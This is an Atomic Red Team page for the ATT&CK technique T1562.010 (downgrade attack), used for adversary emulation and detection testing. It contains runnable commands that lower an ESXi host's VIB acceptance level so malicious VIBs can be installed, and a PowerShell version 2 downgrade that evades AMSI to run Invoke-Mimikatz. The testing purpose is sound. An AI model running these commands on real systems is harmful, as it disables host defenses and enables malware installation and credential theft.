T1562.010 - Impair Defenses: Downgrade Attack

Description from ATT&CK

Adversaries may downgrade or use a version of system features that may be outdated, vulnerable, and/or does not support updated security controls. Downgrade attacks typically take advantage of a system’s backward compatibility to force it into less secure modes of operation. Adversaries may downgrade and use various less-secure versions of features of a system, such as [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)s or even network protocols that can be abused to enable [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) or [Network Sniffing](https://attack.mitre.org/techniques/T1040).(Citation: Praetorian TLS Downgrade Attack 2014) For example, [PowerShell](https://attack.mitre.org/techniques/T1059/001) versions 5+ includes Script Block Logging (SBL) which can record executed script content. However, adversaries may attempt to execute a previous version of PowerShell that does not support SBL with the intent to [Impair Defenses](https://attack.mitre.org/techniques/T1562) while running malicious scripts that may have otherwise been detected.(Citation: CrowdStrike BGH Ransomware 2021)(Citation: Mandiant BYOL 2018)(Citation: att_def_ps_logging) Adversaries may similarly target network traffic to downgrade from an encrypted HTTPS connection to an unsecured HTTP connection that exposes network data in clear text.(Citation: Targeted SSL Stripping Attacks Are Real)(Citation: Crowdstrike Downgrade)

Atomic Tests


Atomic Test #1 - ESXi - Change VIB acceptance level to CommunitySupported via PowerCLI

An adversary can change the VIB acceptance level to CommunitySupported to downgrade the acceptance criteria.This can be accomplished via PowerCLI. Afterwards an adversary may proceed to installing malicious VIBs on the host. Reference

Supported Platforms: Linux

auto_generated_guid: 062f92c9-28b1-4391-a5f8-9d8ca6852091

Inputs:

| Name | Description | Type | Default Value | |——|————-|——|—————| | vm_host | Specify the host name of the ESXi Server | string | atomic.local| | vm_user | Specify the privilege user account on ESXi Server | string | root| | vm_pass | Specify the privilege user password on ESXi Server | string | pass|

Attack Commands: Run with
1
powershell
! Elevation Required (e.g. root or admin)

1
2
3
4
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false 
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
(Get-EsxCli -VMHost #{vm_host} -V2).software.acceptance.set.Invoke(@{level = "CommunitySupported"})
Disconnect-VIServer -Confirm:$false

Dependencies: Run with
1
powershell
!

Description: Check if VMWARE PowerCLI PowerShell Module is installed.
Check Prereq Commands:
1
2
$RequiredModule = Get-Module -Name VMware.PowerCLI -ListAvailable
if (-not $RequiredModule) {exit 1}
Get Prereq Commands:
1
Install-Module -Name VMware.PowerCLI -Confirm:$false



Atomic Test #2 - ESXi - Change VIB acceptance level to CommunitySupported via ESXCLI

An adversary will change the VIB acceptance level to CommunitySupported to downgrade the acceptance criteria via ESXCLI. Afterwards an adversary may proceed to installing malicious VIBs on the host. Reference

Supported Platforms: Linux

auto_generated_guid: 14d55b96-b2f5-428d-8fed-49dc4d9dd616

Inputs:

| Name | Description | Type | Default Value | |——|————-|——|—————| | vm_host | Specify the host name of the ESXi Server | string | atomic.local| | vm_user | Specify the privilege user account on ESXi Server | string | root| | vm_pass | Specify the privilege user password on ESXi Server | string | pass| | plink_file | Path to plink | path | PathToAtomicsFolder\..\ExternalPayloads\plink.exe| | cli_script | Path to script with commands to change acceptance level | path | PathToAtomicsFolder\T1562.010\src\esx_community_supported.txt|

Attack Commands: Run with
1
command_prompt
!

echo "" | "#{plink_file}" "#{vm_host}" -ssh  -l "#{vm_user}" -pw "#{vm_pass}" -m "#{cli_script}"

Dependencies: Run with
1
powershell
!

Check Prereq Commands:
1
if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
Get Prereq Commands:
1
2
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"



Atomic Test #3 - PowerShell Version 2 Downgrade

Executes outdated PowerShell Version 2 which does not support security features like AMSI. By default the atomic will attempt to execute the cmdlet Invoke-Mimikatz whether it exists or not, as this cmdlet will be blocked by AMSI when active.

Supported Platforms: Windows

auto_generated_guid: 47c96489-2f55-4774-a6df-39faff428f6f

Inputs:

| Name | Description | Type | Default Value | |——|————-|——|—————| | v2_command | Specify the command to execute with Version 2 | string | Invoke-Mimikatz|

Attack Commands: Run with
1
powershell
!

1
PowerShell -version 2 -command '#{v2_command}'

Dependencies: Run with
1
powershell
!

Description: Check if Version 2 is installed.
Check Prereq Commands:
1
2
$v2_installed = PowerShell -version 2 -command '$PSVersionTable.PSVersion.Major'
if (-not $v2_installed) {exit 1} else {exit 0}
Get Prereq Commands:
1
echo "Manually install PowerShell Version 2"